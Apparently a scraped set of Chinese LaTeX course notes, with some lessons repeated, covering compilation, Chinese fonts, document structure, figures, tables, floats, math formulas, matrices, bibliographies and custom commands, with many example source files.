    \begin{table}[h]
    \centering
    \caption{考试成绩单}\label{tab-score}
    \begin{tabular}{|l|c|c|c|p{1.5cm}|}
    \hline \hline
    姓名 & 语文 & 数学 & 外语 & 备注 \\
    \hline
    张三 & 87 & 100 & 93 & 优秀 \\
    \hline
    李四 & 75 & 64 & 52 & 补考另行通知 \\
    \hline
    王二 & 80 & 82 & 78 & \\
    \hline
    \end{tabular}
    \end{table}

    \end{document}

P10_latex10 - First steps with math formulas in LaTeX

    \documentclass{article}

    \usepackage{ctex}
    \usepackage{amsmath}

    \begin{document}
    \section{简介}
    \LaTeX{}将排版内容分为文本模式和数学模式。
    文本模式用于普通文本排版,数学模式用于数学公式排版。
    \section{行内公式}
    \subsection{美元符号}
    交换律是 $a+b=b+a$,如 $1+2=2+1=3$
    \subsection{小括号}
    交换律是 \(a+b=b+a\),如\(1+2=2+1=3\)
    \subsection{math环境}
    交换律是 \begin{math}a+b=b+a\end{math},如
    \begin{math}1+2=2+1=3\end{math}。
    \section{上下标}
    \subsection{上标}
    $3x^{20} - x + 2 = 0$

    $3x^{3x^{20} - x + 2} - x + 2 = 0$
    \subsection{下标}
    $a_0, a_1, a_2$

    $a_0, a_1, a_2, ..., a_{3x^{20} - x + 2}$
    \section{希腊字母}
    $\alpha$
    $\beta$
    $\gamma$
    $\epsilon$
    $\pi$
    $\omega$

    $\Gamma$
    $\Delta$
    $\Theta$
    $\Pi$
    $\Omega$

    $\alpha^3 + \beta^2 + \gamma = 0$

    \section{数学函数}
    $\log$
    $\sin$
    $\cos$
    $\arcsin$
    $\arccos$
    $\arctan$
    $\ln$

    $\sin^2x+\cos^2x=1$
    $y=\arcsin x$

    $y=\sin^{-1}x$

    $y=\log_2x$

    $y=\ln x$

    $\sqrt{2}$ $\sqrt{x^2+y^2}$ $\sqrt{2+\sqrt{2}}$ $\sqrt[4]{x}$
    \section{分式}
    大约是原体积的$3/4$
    大约是原体积的$\frac{3}{4}$

    $\frac{x}{x^2 + x + 1}$

    $\frac{\sqrt{x-1}}{\sqrt{x+1}}$

    $\frac{1}{1 + \frac{1}{x}}$

    $\sqrt{\frac{x}{x^2 + x + 1}}$
    \section{行间公式}
    \subsection{美元符号}
    交换律是
    $$a+b=b+a$$

    $$1+2=2+1=3$$
    \subsection{中括号}
    交换律是
    \[a+b=b+a\]

    \[1+2=2+1=3\]
    \subsection{displaymath环境}
    交换律是
    \begin{displaymath}
    a+b=b+a,
    \end{displaymath}

    \begin{displaymath}
    1+2=2+1=3.
    \end{displaymath}
    \subsection{自动编号公式equation环境}
    交换律见式\ref{eq:commutative}
    \begin{equation}
    a+b=b+a \label{eq:commutative}
    \end{equation}
\subsection{不编号公式equation*环境} % requires the amsmath package
    交换律见式\ref{eq:commutative2}
    \begin{equation*}
    a+b=b+a \label{eq:commutative2}
    \end{equation*}

    公式的编号与交叉引用也是自动实现的,
    大家在排版中,要习惯与采用自动化的方式处理图、表、公式的编号与交叉引用。
    \end{document}

latex11 - Matrices in LaTeX math formulas

Matrix environments:

• & separates columns
• \\ separates rows
    \documentclass{ctexart}

    \usepackage{amsmath}

    \newcommand{\adots}{\mathinner{\mkern2mu
    \raisebox{0.1em}{.}
    \mkern2mu\raisebox{0.4em}{.}
    \mkern2mu\raisebox{0.7em}{.}\mkern1mu}}

    \begin{document}
    \section{matrix环境}
    \[
    \begin{matrix}
    0 & 1 \\
    1 & 0
    \end{matrix}
    \]

    \section{pmatrix环境}
    \[
    \begin{pmatrix}
    0 & -1 \\
    1 & 0
    \end{pmatrix}
    \]

    \section{bmatrix环境}
    \[
    \begin{bmatrix}
    0 & -1 \\
    1 & 0
    \end{bmatrix}
    \]

    \section{Bmatrix环境}
    \[
    \begin{Bmatrix}
    0 & -1 \\
    1 & 0
    \end{Bmatrix}
    \]

    \section{vmatrix环境}
    \[
    \begin{vmatrix}
    0 & -1 \\
    1 & 0
    \end{vmatrix}
    \]

    \section{Vmatrix环境}
    \[
    \begin{Vmatrix}
    0 & -1 \\
    1 & 0
    \end{Vmatrix}
    \]

    \section{可以使用上下标}
    \[
    A = \begin{pmatrix}
    a_{11}^2 & a_{12}^2 & a_{13}^2 \\
    0 & a_{22} & a_{23} \\
    0 & 0 & a_{33}
    \end{pmatrix}
    \]

    \section{常用省略号:$\backslash$dots,$\backslash$vdots,$\backslash$ddots}
    没有$\backslash$adots,需要手动定义。
    \[
    A = \begin{bmatrix}
    a_{11} & \dots & a_{1n} \\
    \adots & \ddots & \vdots \\
    0 & & a_{nn}
    \end{bmatrix}_{n \times n}
    \]

    \section{分块矩阵(矩阵嵌套)}
    \[
    \begin{pmatrix}
    \begin{matrix}1&0\\0&1\end{matrix} & \text{\Large 0} \\
    \text{\Large 0} & \begin{matrix} 1&0\\0&-1\end{matrix}
    \end{pmatrix}
    \]

    \section{三角矩阵}
    \[
    \begin{pmatrix}
    a_{11} & a_{12} & \cdots & a_{1n} \\
    & a_{22} & \cdots & a_{2n} \\
    & & \ddots & \vdots \\
    \multicolumn{2}{c}{\raisebox{1.3ex}[0pt]{\Huge 0}} & & a_{nn}
    \end{pmatrix}
    \]

    \section{跨列的省略号} % \hdotsfor{columns}
    \[
    \begin{pmatrix}
    1 & \frac 12 & \dots & \frac 1n \\
    \hdotsfor{4} \\
m & \frac m2 & \dots & \frac mn
    \end{pmatrix}
    \]

    \section{行内小矩阵(smallmatrix)环境}
    复数 $z = (x, y)$ 可也用矩阵
    \begin{math}
    \left(
    \begin{smallmatrix}
    x & -y \\
    y & -x
    \end{smallmatrix}
    \right)
    \end{math}
    来表示。

    \section{array环境(类似于表格环境tabular)}
    \[
    \begin{array}{r|r}
    \frac{1}{2} & 0 \\
    \hline
    0 & -\frac a{bc} \\
    \end{array}
    \]

    \section{用array环境构造复杂矩阵}
    \[
% @{<content>} inserts arbitrary material without counting as a column
% here a negative space shifts the next column left by 5pt
\begin{array}{c@{\hspace{-5pt}}l}
% row 1, column 1
\left(
\begin{array}{ccc|ccc}
a & \cdots & a & b & \cdots & b \\
& \ddots & \vdots & \vdots & \adots \\
& a & b \\ \hline
& & & c & \cdots & c \\
& & & \vdots & & \vdots \\
\multicolumn{3}{c|}{\raisebox{2ex}[0pt]{\Huge 0}} & c & \cdots & c
\end{array}
\right)
% row 1, column 2
\begin{array}{l}
% \left. merely pairs with \right\}; it prints nothing
\left. \rule{0mm}{7mm}\right\}p \\
\\
\left.\rule{0mm}{7mm}\right\}q
\end{array}
\\[-5pt]
% row 2, column 1
\begin{array}{cc}
\underbrace{\rule{17mm}{0mm}}_m &
\underbrace{\rule{17mm}{0mm}}_m
\end{array}
& % row 2, column 2
\end{array}
    \]

    \end{document}

latex12 - Multi-line formulas in LaTeX math

    \documentclass{ctexart}

    \usepackage{amsmath}
    \usepackage{amssymb}

    \begin{document}
    \section{gather 标准多行公式}
    \subsection{gather 带编号}
    \begin{gather}
    a + b = b + a \\
ab = ba
    \end{gather}

    \subsection{gather* 不带编号}
    \begin{gather*}
    3+5=5+3=8 \\
    3 \times 5 = 5 \times 3
    \end{gather*}

    \subsection{在换行符前使用 notag 阻止编号}
    \begin{gather}
    3^2 + 4^2 = 5^2 \notag \\
    5^2 + 12^2 = 13^2 \notag \\
    a^2 + b^2 = c^2
    \end{gather}

    \section{align 对齐多行公式}
    \subsection{align 带编号}
    \begin{align}
    x & = t + \cos t + 1 \\
    y & = 2\sin t
    \end{align}

    \subsection{align* 不带编号}
    \begin{align*}
    x & = t & x & = \cos t & x & =t \\
    y & = 2t & y & = \sin(t+1) & y & = \sin t
    \end{align*}

    \section{split 环境(对齐采用 align 环境的方式,编号在中间)}
    \begin{equation}
    \begin{split}
    \cos 2x &= \cos^2x - \sin^2x \\
    &= 2\cos^2x - 1
    \end{split}
    \end{equation}

    \section{cases 环境}
    分段函数,每行公式中使用 \& 分割为两部分,通常表示值和后面的条件。
    \begin{equation}
    D(x) = \begin{cases}
    1, & \text{如果 } x \in \mathbb{Q}; \\
    0, & \text{如果 } x \in \mathbb{R}\setminus\mathbb{Q}.
    \end{cases}
    \end{equation}
    \end{document}

P13_latex13 - Bibliographies in LaTeX with BibTeX

Managing references directly in the tex file

\begin{thebibliography}{99}  % the 99 means the entries are numbered and up to 99 entries are expected; if you have more, just use a larger number
\bibitem[<label>]{<cite key>} reference entry 1
\bibitem[<label>]{<cite key>} reference entry 2
...
\end{thebibliography}

A reference entry contains the authors, title, publisher, year, edition, pages, and so on.

Citations take the form \cite{<cite key 1>, <cite key 2>, ...}


    \documentclass{ctexart}

    \begin{document}
    引用一篇文章\cite{article1} 引用一本书\cite{book1}等

    \begin{thebibliography}{99}
    \bibitem{article1}陈立辉,苏伟,蔡川,陈晓云.
    \emph{基于 LaTex 的 web 数学公式提取方法研究}[J]。计算机科学。2014(06)

    \bibitem{book1}william H.Press,Saul A. Teukolsky,William T. Vetterling,Brian P.Elannery,
    \emph{Numerical Recipes js Edition:
    The Art of Scientific Computing}
    Cambridge University Press, New York,2007.

    \bibitem{latexGuide} Kopka Helmut, w.Daly Patrick,
    \emph{Guide to \LaTeX}, $4^{th}$ Edition.
    Available at \texttt{http://www.amazon.com}.

    \bibitem{latexMath} Graetzer George, \emph{Math Into \LaTeX},
    BirkhAauser Boston; 3 edition (June 22, 2000).
    \end{thebibliography}
    \end{document}

    使用 BibTeX

    test.bib文件中输入如下内容:

    @book{mittelbach2004,
    title = {The {{\LaTex}} Companion},
    publisher = {Addison-wesley},
    year = {2004},
    author = {Frank Mittelbach and Michel Goossens},
    series = {Tools and Techniques for Computer Typesetting},
    address = {Boston},
    edition = {Second}
    }

    需要多次编译:

    png

    \documentclass{ctexart}

    \bibliographystyle{plain} % 可选选项 plain unsrt alpha abbrv

    \begin{document}
    这是一个参考文献的引用:\cite{mittelbach2004}
    \bibliography{test}
    \end{document}
    • 使用\bibliography{test}以引用test.bib
    • 使用\cite{mittelbach2004}引用mittelbach2004

    使用google学术百度学术等获得bib格式文件:

    png

    • 使用\noctite{*}在参考文献中显示正文中未引用的文献。

    • 使用zotero从网站中批量获取文献的BibTeX

    • 使用JabRef管理参考文献中的.bib文件。

    png

    P14_latex14-LaTeX中的参考文献BibLaTeX

    • biblatex/biber新的 $\TeX$ 参考文献排版引擎。

    • 样式文件(参考文献样式文件–bbx文件,引用样式文件–cbx文件)使用 $\LaTeX$ 编写。

    • 支持根据本地化排版,如:

      • biber -l zh__pinyin texfile,用于指定按拼音排序
      • biber -l zh__stroke texfile,用于按笔画排序

    试不出来orz…可能是bib文件本身有问题?

    \documentclass{ctexart}

    \usepackage[style=caspervector,
    backend=biber,utf8,sorting=ecnty]{biblatex}

    \addbibresource{test.bib}

    \begin{document}
    % 一次管理,多次应用
    无格式化引用 \cite{2016An}

    带方括号的引用 \parencite{2016Analyzing}

    上标引用 \supercite{mittelbach2004}

    \printbibliography[title = {参考文献}] % 修改标题,默认为 References
    \end{document}

    P15_latex15-LaTeX中的自定义命令和环境

    • \newcommand定义命令
    • 命令只能由字母组成,不能以\end开头
    • \newcommand<命令>[<参数个数>][<首参数默认值>]{<具体定义>}

    ​ 定义命令和环境是进行$\LaTeX$格式定制、达成内容与格式分离目标的利器。使用自定义的命令和环境把字体、字号、缩进、对齐、间距等各种琐细的内容包装起来,赋以一个有意义的名字,可以使文挡结构清晰、代码整洁、易于维护。

    ​ 在使用宏定义的功能时,要综合利用各种已有的命令、环境、变量等功能,事实上,前面所介绍的长度变量与盒子、字体字号等内容,大多并不直接出现在文档正文中,而主要都是用在实现各种结构化的宏定义里。

    \documentclass{ctexart}

    % \newcommand 可以是简单的字符串替换,例如:
    % 使用 \PRC 相当于 People's Republic of \emph{China} 这一串内容
    \newcommand\PRC{People's Republic of \emph{China}}

    % \newcommand 也可以使用参数
    % 参数个数可以从 1 到 9,使用时用 #1, #2, ..., #9 表示
    \newcommand\loves[2]{#1 喜欢 #2}
    \newcommand\hatedby[2]{#2 不受 #1 喜欢}

    % \newcommand 的参数也可以有默认值
    % 指定参数个数的同时指定了首个参数的默认值,那么这个命令的
    % 第一个参数就成为可选的参数(要使用中括号指定)
    \newcommand\love[3][喜欢]{#2 #1 #3}

    % \renewcommand-重定义命令
    % 与 \newcommand 命令作用和用法相同,但只能用于已有命令
    % \renewcommand<命令>[<参数个数>][<首参数默认值>]{<具体定义>}
    \renewcommand\abstractname{内容简介}

    % 定义和重定义环境
    % \newenvironment<环境名称>}[<参数个数>][<首参数默认值>]
    % <环境前定义>
    % <环境后定义>
    % renewenvironment{<环境名称>}[<参数个数>][<首参数默认值>]
    % {<环境前定义>}
    % {<环境后定义>}

    % 为 book 类中定义摘要(abstract)环境
    \newenvironment{myabstract}[1][摘要]%
    {\small
    \begin{center}\bfseries #1\end{center}%
    \begin{quotation}}%
    {\end{quotation}}

    % 环境参数只有<环境前定义>中可以使用参数,
    % <环境后定义>中不能再使用环境参数。
    % 如果需要,可以先把前面得到的参数保存在一个命令中,在后面使用:
    \newenvironment{Quotation}[1]%
    {\newcommand\quotesource{#1}%
    \begin{quotation}}
    {\par\hfill---《\textit{\quotesource}》
    \end{quotation}}

    \begin{document}

    \PRC

    \loves{猫儿}{鱼}

    \hatedby{猫儿}{萝卜}

    \love{猫儿}{鱼}

    \love[最爱]{猫儿}{鱼}

    \begin{abstract}
    这是一段摘要...
    \end{abstract}

    \begin{myabstract}
    这是一段自定义摘要...
    \end{myabstract}

    \begin{Quotation}{易$\cdot$乾}
    初九,潜龙勿用。
    \end{Quotation}

    \end{document}
    ]]>
+ Resources

Courses

P1_latex01 - Installing and configuring the LaTeX environment

Installation

Install $\TeX$ Live only; do not mix it with $Mik\TeX$ or other distributions!

$C\TeX$ itself bundles $Mik\TeX$.

Compiling

Create a file test.tex and enter the following:

    \documentclass{article}

    \begin{document}

    Hello \LaTeX

    \end{document}

In the TERMINAL, type latex test.tex to compile test.tex:

    PS D:\Study\0th-year-master\LateX\20230109> latex test.tex
    This is pdfTeX, Version 3.14159265-2.6-1.40.16 (MiKTeX 2.9)
    (test.tex
    LaTeX2e <2016/03/31>
    Babel <3.9q> and hyphenation patterns for 1 language(s) loaded.
    Document Class: article 2014/09/29 v1.4h Standard LaTeX document class
    ("C:\Users\gzjzx\AppData\Local\Programs\MiKTeX 2.9\tex/latex\base\size10.clo"))

    No file test.aux.
    [1] (test.aux) )
    Output written on test.dvi (1 page, 300 bytes).
    Transcript written on test.log.

This generates test.dvi; then run dvipdfmx test.dvi to produce test.pdf:

    PS D:\Study\0th-year-master\LateX\20230109> dvipdfmx test.dvi
    test.dvi -> test.pdf
    [1]
    2875 bytes written

Or run xelatex test.tex to compile test.tex straight to test.pdf:

    PS D:\Study\0th-year-master\LateX\20230109> xelatex test.tex
    This is XeTeX, Version 3.14159265-2.6-0.99992 (MiKTeX 2.9)
    entering extended mode
    (test.tex
    LaTeX2e <2018-04-01> patch level 5
    ("C:\Users\gzjzx\AppData\Local\Programs\MiKTeX 2.9\tex/latex\base\article.cls"
    Document Class: article 2014/09/29 v1.4h Standard LaTeX document class
    ("C:\Users\gzjzx\AppData\Local\Programs\MiKTeX 2.9\tex/latex\base\size10.clo"))
    (test.aux) [1] (test.aux) )
    Output written on test.pdf (1 page).
    Transcript written on test.log.

You can also write a batch file build.bat to do everything in one step:

    latex test.tex
    dvipdfmx test.dvi
    del *.aux *.dvi *.log

    xelatex test.tex
    del *.aux *.dvi *.log

Then simply type build in the TERMINAL to run the whole compilation.

In VS Code you can compile directly with Ctrl+Alt+B.

Producing Chinese text

First make sure the tex file is saved with UTF-8 encoding.

Load the ctex package with \usepackage{ctex} to enable Chinese.

    \documentclass{article}

    \usepackage{ctex}

    \begin{document}

    你好, \LaTeX

    \end{document}

Using TeXstudio

P2_latex02 - Basic structure of a LaTeX source file

% preamble
\documentclass{article} % book, report, letter
\title{My First Document}
\author{Nan Geng}
\date{\today}
% body
    \begin{document}
    \maketitle
    Hello World!

    % here is my big formula.
    Let $f(x)$ be defined by the formula
    $$f(x)=3x^2+x-1$$ which is a polynomial of degree 2.
    \end{document}

A source file is divided into a preamble and a body.

P3_latex03 - Handling Chinese in LaTeX

Chinese support

Make sure the compiler is XeLaTeX and the file is encoded in UTF-8.

In the preamble, use either

    \documentclass{article}

    \usepackage{ctex}

or

\documentclass{ctexart}

to enable Chinese support.

% preamble
\documentclass{ctexart} % book, report, letter

    % \usepackage{ctex}

    \newcommand\degree{^\circ}

    \title{\heiti 杂谈勾股定理}
    \author{张三}
    \date{\today}
% body
    \begin{document}
    \maketitle

    勾股定理可以用现代语言表述如下:

    直角三角形斜边的平方等于两腰的平方和。

    可以用符号语言表述为:设直角三角形 $ABC$,其中 $\angle
    C=90\degree$,则有:
\begin{equation} % produces a numbered display equation
    AB^2 = BC^2 + AC^2.
    \end{equation}
    \end{document}
• Define \degree in the preamble with \newcommand\degree{^\circ}; otherwise compilation fails.
• Use \begin{equation}...\end{equation} to produce numbered display equations.

Viewing documentation

Run texdoc ctex in the TERMINAL to open the ctex manual.

Run texdoc lshort-zh to open the Chinese edition of the short introduction to LaTeX.

P4_latex04 - Font and font-size settings in LaTeX

Font attributes

In $\LaTeX$, a font has five attributes:

• Font encoding

  • Text font encodings: OT1, T1, EU1, etc.
  • Math font encodings: OML, OMS, OMX, etc.
• Font family

  • Roman Family \textrm: strokes have serifs
  • Sans Serif Family \textsf: strokes have no serifs
  • Typewriter Family \texttt: every character has the same width (monospaced)
• Font series

  • weight
  • width
• Font shape

  • Upright Shape
  • Italic Shape
  • Slanted Shape
  • Small Caps Shape
• Font size

Setting the font family

Note the declaration forms and their scope (the braces):

% font families: Roman Family, Sans Serif Family, Typewriter Family
    \textrm{Roman Family}
    \textsf{Sans Serif Family}
    \texttt{Typewriter Family}

    \rmfamily Roman Family
    {\sffamily Sans Serif Family}
    {\ttfamily Typewriter Family}

    {\sffamily who you are? you find self on everyone around.
    take you as the same as others!}

    {\ttfamily Are you wiser than others?
    definitely no. insome ways, may it is true.
    what can you achieve? aluxurious house?
    a brillilant car? an admirable career?who knows? }

Setting the font series (weight, width)

% font series (weight, width)
    \textmd{Medium Series} \textbf{Boldface Series}

    {\mdseries Medium Series} {\bfseries Boldface Series}

Font shapes (upright, italic, slanted, small caps)

    \textup{Upright Shape}
    \textit{Italic Shape}
    \textsl{Slanted Shape}
    \textsc{Small Caps Shape}

{\upshape Upright Shape}
{\itshape Italic Shape}
{\slshape Slanted Shape}
{\scshape Small Caps Shape}

Chinese fonts

% Chinese fonts
    {\songti 宋体}
    {\heiti 黑体}
    {\fangsong 仿宋}
    {\kaishu 楷书}

    中文字体的\textbf{粗体}是{\heiti 黑体},\textit{斜体}是{\kaishu 楷体}。

Font size

% font sizes
    {\tiny Hello}\\
    {\scriptsize Hello}\\
    {\footnotesize Hello}\\
    {\small Hello}\\
    {\normalsize Hello}\\
    {\large Hello}\\
    {\Large Hello}\\
    {\LARGE Hello}\\
    {\huge Hello}\\
    {\Huge Hello}\\

Chinese font-size command

% Chinese font-size command (zihao)
    \zihao{-0} 你好!

Custom font commands

Piling up font modifiers goes against the $\LaTeX$ idea of separating content from format; define your own command with \newcommand instead.

In the preamble:

    \newcommand{\myfont}{\textbf{\textsf{Fancy Text}}}

Every \myfont in the body is then replaced by \textbf{\textsf{Fancy Text}}.

% use the custom font command
    \myfont

P5_latex05 - Basic document structure in LaTeX

Sectioning

In the body, outline the document with \section{}; use \subsection{} and \subsubsection{} to subdivide further.

    \documentclass{article}

    \usepackage{ctex}

    \begin{document}

    \section{引言}
    \section{实验方法}
    \section{实验结果}
    \subsection{数据}
    \subsection{图表}
    \subsubsection{实验条件}
    \subsubsection{实验过程}
    \section{结论}
    \section{致谢}

    \end{document}

Configuring the format

\documentclass{ctexart} changes the default formatting, but the format can also be configured by hand.

Formatting is configured in the preamble; separating content from format is the fundamental idea of $\LaTeX$.

    \documentclass{ctexart}
% ======= heading formats ========
\ctexset{
% customize \section
section={
name={,、},
number={\chinese{section}},
format=\heiti\raggedright\zihao{-4}, % section heading: heiti, ragged right, size xiao-4
    aftername=\hspace{0pt},
    beforeskip=1ex,
    afterskip=1ex
    },
% customize \subsection
subsection={
name={,、},
number={\arabic{subsection}},
format=\heiti\zihao{5}, % subsection heading: heiti, size 5
    aftername=\hspace{0pt},
    beforeskip=1ex,
    afterskip=1ex
    }
    }

    \begin{document}

    \section{引言}
    近年来,随着逆向工程和三维重建技术的发展和应用,
    获取现实世界中物体的三维数据的方法越来越多的关注和研究,
    很多研究机构和商业公司都陆续推出了自己的三维重建系统。

    近年来,随着逆向工程和三维重建技术的发展和应用,\\
    获取现实世界中物体的三维数据的方法越来越多的关注和研究。
    \par 很多研究机构和商业公司都陆续推出了自己的三维重建系统。

    \section{实验方法}
    \section{实验结果}
    \subsection{数据}
    \subsection{图表}
    \subsubsection{实验条件}
    \subsubsection{实验过程}
    \section{结论}
    \section{致谢}

    \end{document}
• A blank line or \par starts a new paragraph
• \\ breaks the line without starting a new paragraph

Generating a table of contents

Use \documentclass{ctexbook} and \tableofcontents to generate a table of contents.

    \documentclass[UTF8,a4paper,15pt,titlepage,oneside]{ctexbook}

    \begin{document}
    \tableofcontents
    \chapter{绪论}
    \section{引言}
    近年来,随着逆向工程和三维重建技术的发展和应用,
    获取现实世界中物体的三维数据的方法越来越多的关注和研究,
    很多研究机构和商业公司都陆续推出了自己的三维重建系统。

    近年来,随着逆向工程和三维重建技术的发展和应用,\\
    获取现实世界中物体的三维数据的方法越来越多的关注和研究。
    \par 很多研究机构和商业公司都陆续推出了自己的三维重建系统。

    \section{实验方法}
    \section{实验结果}
    \subsection{数据}
    \subsection{图表}
    \section{结论}
    \section{致谢}

    \end{document}

P6_latex06 - Special characters in LaTeX

• Special characters
  • Whitespace
    • A blank line starts a new paragraph; consecutive blank lines count as one
    • Indentation is automatic; never fake it with spaces
    • Multiple spaces in English text collapse into one; spaces in Chinese text are ignored
    • Spacing between Chinese and other characters is handled automatically by XeLaTeX
    • Never use full-width Chinese spaces
  • $\LaTeX$ control characters
  • Typographic symbols
  • $\TeX$ logos
  • Quotation marks
  • Hyphens and dashes
  • Non-English letters
  • Accents (using o as an example)
    \documentclass{article}

    \usepackage{ctex}
    \usepackage{xltxtra}
    \usepackage{texnames}
    \usepackage{mflogo}

    \begin{document}

    \section{空白符号}
% 1em (the width of M in the current font)
a\quad b

% 2em
a\qquad b

% about 1/6 em
a\,b a\thinspace b

% 0.5 em
a\enspace b

% normal interword space
a\ b

% non-breaking space
a~b

% 1pc=12pt=4.2188mm
    a\kern 1pc b

a\kern -1em b % kerning may be negative

a\hskip 1em b

a\hspace{35pt}b

% phantom: occupies the width of xyz
a\hphantom{xyz}b

% stretchable (rubber) space
    a\hfill b

    \section{\LaTeX 控制符}
    \# \$ \% \{ \} \~{} \_{} \^{} \textbackslash \&

    \section{排版符号}
    \S \P \dag \ddag \copyright \pounds

    \section{\TeX 标志符号}
% basic logos
\TeX{} \LaTeX{} \LaTeXe{}

% provided by the xltxtra package
\XeLaTeX

% provided by the texnames package
\AmSTeX{} \AmS-\LaTeX{}
\BibTeX{} \LuaTeX{}

% provided by the mflogo package
    \METAFONT{} \MF{} \MP{}

    \section{引号}
    `'``''``你好''

    \section{连字符}
    - -- ---

    \section{非英文字符}
    \oe \OE \ae \AE \aa \AA \o \O \l \L \ss \SS !`?`

    \section{重音符号(以 o 为例)}
\`o \'o \^o \"o \~o \=o \.o \u{o} \v{o} \H{o} \r{o} \t{o} \b{o} \c{o} \d{o}

    \end{document}

P7_latex07 - Figures in LaTeX

• Load \usepackage{graphicx} to include graphics

• Syntax: \includegraphics[<options>]{<filename>}

  • Options include:

    • scale=0.3  scale by a factor of 0.3
    • height=2cm  set the height to 2 cm
    • width=2cm  set the width to 2 cm
    • height=0.1\textheight  0.1 times the text height
    • width=0.2\textwidth  0.2 times the text width
    • angle=-45, width=0.2\textwidth  rotate 45° clockwise at 0.2 times the text width (a combined sketch follows the example below)

    Run texdoc graphicx in the terminal for the full documentation.

  • The filename extension may be included or omitted

• Supported formats: EPS, PDF, PNG, JPEG, BMP

    \documentclass{ctexart}
    \usepackage{graphicx}
\graphicspath{{figures/}, {pics/}} % images live in figures/ or pics/ under the current directory

    \begin{document}
    \LaTeX{}中的插图:

    \includegraphics[scale=0.3]{lion}
    \end{document}
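As a quick sketch of combining the options listed above (assuming the same lion image), rotation and relative width can be given together:

\includegraphics[angle=-45, width=0.2\textwidth]{lion}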


P8_latex08 - Tables in LaTeX

\begin{tabular}[<vertical alignment>]{<column spec>}
<entry> & <entry> & ... & <entry> \\
    \end{tabular}

• \\ ends a table row
• & separates columns
• Column format specifiers:
  • l  left-aligned column
  • c  centered column
  • r  right-aligned column
  • p{<width>}  fixed-width column with automatic line wrapping (a vertical-alignment sketch follows this list)
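A minimal sketch of the optional vertical-alignment argument (not from the original): t aligns the table's first row with the surrounding text line, b its last row.

\begin{tabular}[t]{l}
top \\ aligned
\end{tabular}
\begin{tabular}[b]{l}
bottom \\ aligned
\end{tabular}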
    \documentclass{ctexart}

    \begin{document}
    \begin{tabular}{|l|c|c|c|p{1.5cm}|}
    \hline \hline
    姓名 & 语文 & 数学 & 外语 & 备注 \\
    \hline
    张三 & 87 & 100 & 93 & 优秀 \\
    \hline
    李四 & 75 & 64 & 52 & 补考另行通知 \\
    \hline
    王二 & 80 & 82 & 78 & \\
    \hline
    \end{tabular}
    \end{document}

P9_latex09 - Floats in LaTeX

Flexible handling of figures and tables requires the float environments: figure for graphics and table for tables.

Floats provide:

• flexible page breaking (avoiding the gaps an unbreakable block would leave)
• captions for figures and tables
• cross-references

The figure environment (the table environment is analogous)

\begin{figure}[<placement>]
<any content>
    \end{figure}

The <placement> options (default tbp):

• h, here - at the point in the text where the code appears
• t, top - at the top of this page or a later one
• b, bottom - at the bottom of this page or a later one
• p, page - on a separate page of floats

Caption control (caption, bicaption, and similar packages)

Side-by-side figures and subfigures (subcaption, subfig, floatrow, and similar packages; a subfigure sketch follows below)

Text wrap-around (picinpar, wrapfig, and similar packages)
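A minimal side-by-side sketch, assuming the subcaption package and the lion image from the earlier example:

% preamble: \usepackage{graphicx} and \usepackage{subcaption}
\begin{figure}[htbp]
\centering
\begin{subfigure}{0.45\textwidth}
\centering
\includegraphics[width=\linewidth]{lion}
\caption{left subfigure}
\end{subfigure}
\begin{subfigure}{0.45\textwidth}
\centering
\includegraphics[width=\linewidth]{lion}
\caption{right subfigure}
\end{subfigure}
\caption{two subfigures side by side}
\end{figure}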


Use \label{} and \ref{} for cross-references; compiling twice is usually needed for them to resolve.

    \documentclass{ctexart}
    \usepackage{graphicx}
    \graphicspath{{figures/}}

    \begin{document}

    \LaTeX{}中\TeX 系统的吉祥物---小狮子见图\ref{fig-lion}。

    \begin{figure}[htbp]
    \centering
    \includegraphics[scale=0.3]{lion}
    \caption{\TeX 系统的吉祥物---小狮子}\label{fig-lion}
    \end{figure}

    遥看太白,看积雪皑皑,别有一番风景(图\ref{fig-mountain})

    \begin{figure}[htbp]
    \centering
    \includegraphics[scale=0.3]{mountain}
    \caption{太白山}\label{fig-mountain}
    \end{figure}

    当然,在\LaTeX{}中也可以使用表\ref{tab-score}所示的表格。

    \begin{table}[h]
    \centering
    \caption{考试成绩单}\label{tab-score}
    \begin{tabular}{|l|c|c|c|p{1.5cm}|}
    \hline \hline
    姓名 & 语文 & 数学 & 外语 & 备注 \\
    \hline
    张三 & 87 & 100 & 93 & 优秀 \\
    \hline
    李四 & 75 & 64 & 52 & 补考另行通知 \\
    \hline
    王二 & 80 & 82 & 78 & \\
    \hline
    \end{tabular}
    \end{table}

    \end{document}

P10_latex10 - LaTeX math basics

    \documentclass{article}

    \usepackage{ctex}
    \usepackage{amsmath}

    \begin{document}
    \section{简介}
    \LaTeX{}将排版内容分为文本模式和数学模式。
    文本模式用于普通文本排版,数学模式用于数学公式排版。
    \section{行内公式}
    \subsection{美元符号}
    交换律是 $a+b=b+a$,如 $1+2=2+1=3$
    \subsection{小括号}
    交换律是 \(a+b=b+a\),如\(1+2=2+1=3\)
    \subsection{math环境}
    交换律是 \begin{math}a+b=b+a\end{math},如
    \begin{math}1+2=2+1=3\end{math}。
    \section{上下标}
    \subsection{上标}
    $3x^{20} - x + 2 = 0$

    $3x^{3x^{20} - x + 2} - x + 2 = 0$
    \subsection{下标}
    $a_0, a_1, a_2$

    $a_0, a_1, a_2, ..., a_{3x^{20} - x + 2}$
    \section{希腊字母}
    $\alpha$
    $\beta$
    $\gamma$
    $\epsilon$
    $\pi$
    $\omega$

    $\Gamma$
    $\Delta$
    $\Theta$
    $\Pi$
    $\Omega$

    $\alpha^3 + \beta^2 + \gamma = 0$

    \section{数学函数}
    $\log$
    $\sin$
    $\cos$
    $\arcsin$
    $\arccos$
    $\arctan$
    $\ln$

    $\sin^2x+\cos^2x=1$
    $y=\arcsin x$

    $y=\sin^{-1}x$

    $y=\log_2x$

    $y=\ln x$

    $\sqrt{2}$ $\sqrt{x^2+y^2}$ $\sqrt{2+\sqrt{2}}$ $\sqrt[4]{x}$
    \section{分式}
    大约是原体积的$3/4$
    大约是原体积的$\frac{3}{4}$

    $\frac{x}{x^2 + x + 1}$

    $\frac{\sqrt{x-1}}{\sqrt{x+1}}$

    $\frac{1}{1 + \frac{1}{x}}$

    $\sqrt{\frac{x}{x^2 + x + 1}}$
    \section{行间公式}
    \subsection{美元符号}
    交换律是
    $$a+b=b+a$$

    $$1+2=2+1=3$$
    \subsection{中括号}
    交换律是
    \[a+b=b+a\]

    \[1+2=2+1=3\]
    \subsection{displaymath环境}
    交换律是
    \begin{displaymath}
    a+b=b+a,
    \end{displaymath}

    \begin{displaymath}
    1+2=2+1=3.
    \end{displaymath}
    \subsection{自动编号公式equation环境}
    交换律见式\ref{eq:commutative}
